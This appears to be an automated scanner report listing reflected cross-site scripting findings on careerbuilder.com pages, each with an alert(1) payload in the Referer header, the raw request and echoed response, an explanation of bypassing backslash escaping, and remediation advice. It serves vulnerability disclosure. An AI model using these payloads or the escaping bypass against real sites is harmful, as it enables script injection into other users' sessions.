HTTP/1.1 200 OK Cache-Control: private Content-Length: 64658 Content-Type: text/html; charset=UTF-8 Content-Language: en-GB Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=f43c203601c14c09849a0882f1e9af4e-343074622-R9-4; domain=.careerbuilder.co.uk; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650EC9D4330A539B7B4FC577CE6BC60CD68ACA6056B03B7E1DC7C0DEEB82BE26BD5F763376EB3A27830; domain=.careerbuilder.co.uk; expires=Mon, 14-Nov-2011 23:30:21 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.co.uk; expires=Sun, 14-Nov-2010 23:45:21 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL9 Date: Sun, 14 Nov 2010 23:30:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Jobs. ...[SNIP]... ilder.co.uk'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bea49\\';alert(1)//10979b37ff'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41a66\'%3balert(1)//3658fefac7d was submitted in the Referer HTTP header. This input was echoed as 41a66\\';alert(1)//3658fefac7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mh&sc_cmp2=JS_Nav_Home&ff=21 HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=41a66\'%3balert(1)//3658fefac7d
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47571 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=60103a40306245c9b1dc5dae6b3ca5c4-343071331-XE-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B96361D5E49198BF48A659257B11385CC55216DE07B6CDCEE18499E25441F116329CE0A351F0E8D3; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:30 GMT; path=/; HttpOnly Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/ X-Powered-By: ASP.NET X-PBY: BEAR45 Date: Sun, 14 Nov 2010 22:35:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 41a66\\';alert(1)//3658fefac7d'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d210\'%3balert(1)//e1abceceacf was submitted in the Referer HTTP header. This input was echoed as 7d210\\';alert(1)//e1abceceacf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7d210\'%3balert(1)//e1abceceacf
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47476 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=95e8420371d1452bba994be4d14c4eb5-343071293-wv-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6504AB6FB350B35C1EE0DBAE9BC1201874E308B228A8FA0DAC66A07C247486E660367E6F80633C6DA49; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:52 GMT; path=/; HttpOnly Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/ X-Powered-By: ASP.NET X-PBY: BEAR32 Date: Sun, 14 Nov 2010 22:34:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7d210\\';alert(1)//e1abceceacf'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d515b\'%3balert(1)//6da5c645183 was submitted in the Referer HTTP header. This input was echoed as d515b\\';alert(1)//6da5c645183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Default.aspx?lr=cbcb_elnh&siteid=cbcb_elnh001 HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d515b\'%3balert(1)//6da5c645183
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47500 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=7134646562174cc3b821920eccff1375-343071267-wf-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65016B3D918466049B46A0200D7EFE04BE9BE4588459BE37D8DD8CEDFE0899541EA19AFF8376FCD4E66; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:26 GMT; path=/; HttpOnly Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/ X-Powered-By: ASP.NET X-PBY: BEAR16 Date: Sun, 14 Nov 2010 22:34:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - d515b\\';alert(1)//6da5c645183'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54339\'%3balert(1)//3177172343f was submitted in the Referer HTTP header. This input was echoed as 54339\\';alert(1)//3177172343f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Default.aspx HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=54339\'%3balert(1)//3177172343f
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47550 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=7979d6ddf5214c728b6897911daf0e7e-343071180-w2-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B4EA5019EC41A81277E3289EAD06697DF018AAA532CCFC5E2C01E326E350DC0F80988FB4E11DAA74; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:00 GMT; path=/; HttpOnly Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/ X-Powered-By: ASP.NET X-PBY: BEAR2 Date: Sun, 14 Nov 2010 22:33:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs - ...[SNIP]... server='www'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 54339\\';alert(1)//3177172343f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 816d3\'%3balert(1)//0cc15065b6 was submitted in the Referer HTTP header. This input was echoed as 816d3\\';alert(1)//0cc15065b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobQuery.aspx HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=816d3\'%3balert(1)//0cc15065b6
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 187887 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=f07c2160440d4e08844a6cec09658bf7-343071216-wl-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6504D012A7B391507FFE940DF28A9AA48A0F60C82D7C8BF4A656E193F86871B73B3A745E18F06665B11; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:35 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:36 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR22 Date: Sun, 14 Nov 2010 22:33:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]... pe'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 816d3\\';alert(1)//0cc15065b6'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49ba7\'%3balert(1)//7350fda0f95 was submitted in the Referer HTTP header. This input was echoed as 49ba7\\';alert(1)//7350fda0f95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobResults.aspx HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=49ba7\'%3balert(1)//7350fda0f95
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 186291 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=9d3782ff7de24ff5b9ddcb5e1d05acc5-343071293-ww-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65072DD04B5A48CA25F5DD95CFD78323174C6E7E36E668DD22C053EEEFD125B570C5EC81BFFC9671E6A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:52 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:49:53 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR33 Date: Sun, 14 Nov 2010 22:34:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]... pe'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 49ba7\\';alert(1)//7350fda0f95'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9afb2\'%3balert(1)//19710fa89d5 was submitted in the Referer HTTP header. This input was echoed as 9afb2\\';alert(1)//19710fa89d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobResults.aspx?IPath=JRGCM&sc_cmp1=js_navg_ncc&ncc=%22Edward+Jones+(FA HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9afb2\'%3balert(1)//19710fa89d5
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35278 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=00ee70a8eaf84d37b4c80cb432dc402f-343075004-w3-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650E005A3B4D0F7A37D17B3F768CA09C8188866ADAE4772E4DCB6463293FBA1FF4A9D942F83825DC347; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:36:44 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 23:51:45 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR3 Date: Sun, 14 Nov 2010 23:36:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Edward ...[SNIP]... pe'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9afb2\\';alert(1)//19710fa89d5'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 962e5\'%3balert(1)//e6e15f0f674 was submitted in the Referer HTTP header. This input was echoed as 962e5\\';alert(1)//e6e15f0f674 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Resumes/HourlyResume.aspx HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=962e5\'%3balert(1)//e6e15f0f674
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 28721 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=25427e09788b492cad7382979372fe0f-343071357-x2-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650AC9C21D9414FA081B9EC77A061EAD7E37B5C3AA423D81F33886D4F9E97936B2D443D9CD78ED441B7; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:57 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR38 Date: Sun, 14 Nov 2010 22:35:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Post R ...[SNIP]... t Resume - Create'; s_cb.eVar8='JS_PostResumes - Post Resume - Create'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 962e5\\';alert(1)//e6e15f0f674'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd7da\'%3balert(1)//5262b82cea7 was submitted in the Referer HTTP header. This input was echoed as bd7da\\';alert(1)//5262b82cea7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Jobs/Company/CCBCONVXXXXX423122/Miami-Herald-Media-Company/ HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd7da\'%3balert(1)//5262b82cea7
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42088 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=80649caadc584de391105835ea0644f2-343071299-x6-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6507AED095309BD259F07CE50691A2F38005C49B15140BCCFBAEC1F75473445F7EF756BDD8E17162074; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:59 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEBTEST1 Date: Sun, 14 Nov 2010 22:34:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
